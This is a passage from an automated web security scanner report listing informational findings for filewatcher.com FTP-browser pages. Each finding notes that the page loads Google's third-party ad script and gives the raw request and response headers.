GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "DXVB4wk4jeHDl6oZ1LrRAg"
Content-Length: 8790
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 655
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.879. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7kML8SMhH4+AxHHRDQgGTw"
Content-Length: 11946
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 655
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.880. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "G81HUNRzhla4XbvkNzfXNA"
Content-Length: 9722
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 656
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.881. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/alpha.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/alpha.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/alpha.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "i/69s8X3Kd4cUD5r72JIRA"
Content-Length: 22975
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 661
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.882. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/i386.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GA8dazIf97WhHNs06w41TA"
Content-Length: 26223
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 681
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.883. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/mips64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/mips64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/mips64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QBxYLy581vEfebjWL+acUQ"
Content-Length: 23731
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 661
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.884. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/powerpc.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/powerpc.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/powerpc.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "gXgSmxcrlPEidUBykC+C0Q"
Content-Length: 25367
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 683
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.885. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:16 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fpKPdB3/C3WvW4Ovib5nkg"
Content-Length: 24503
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 680
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.886. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Xxcwuy3GcW12zcg2Ghlcgw"
Content-Length: 21891
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 689
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.887. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nz.debian.org.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "dLHxujfsx7pfMcr8m9uUHw"
Content-Length: 8896
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 632
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/ - FTP Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.888. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nz.debian.org/openbsd.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:08 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "trfsL2l/FauWFI8A0LbCFA"
Content-Length: 8324
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 635
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.889. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.3.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nz.debian.org/openbsd/4.3.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.3.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:08 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Z6LlDcqSE8PR3X5v+/uevA"
Content-Length: 15149
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 639
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.3/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.890. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.3/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nz.debian.org/openbsd/4.3/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.3/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ibao/ZkCEF3AsiHV1IlUZg"
Content-Length: 6570
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 645
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.3/pa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.891. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/amd64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/amd64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/amd64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JKStYYDb1M/OQH0ASesVHQ"
Content-Length: 47479
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 645
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.3/pa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.892. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/powerpc.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/powerpc.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.3/packages/powerpc.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:10 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "J3Yg3+l5I+QhGMCUedKRFw"
Content-Length: 47874
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 645
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.3/pa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.893. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.4.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nz.debian.org/openbsd/4.4.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.4.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:11 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/S1vg9eYT+Yy7x4qmP7fiQ"
Content-Length: 13949
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 645
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.4/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.894. http://www.filewatcher.com/b/ftp/ftp.nz.debian.org/openbsd/4.4/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nz.debian.org/openbsd/4.4/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nz.debian.org/openbsd/4.4/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:12 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "orP/WlhxERLPENIaI2X0uQ"
Content-Length: 6570
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 649
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nz.debian.org/openbsd/4.4/pa
...[SNIP]...
</script>
<script type="text/javascript"
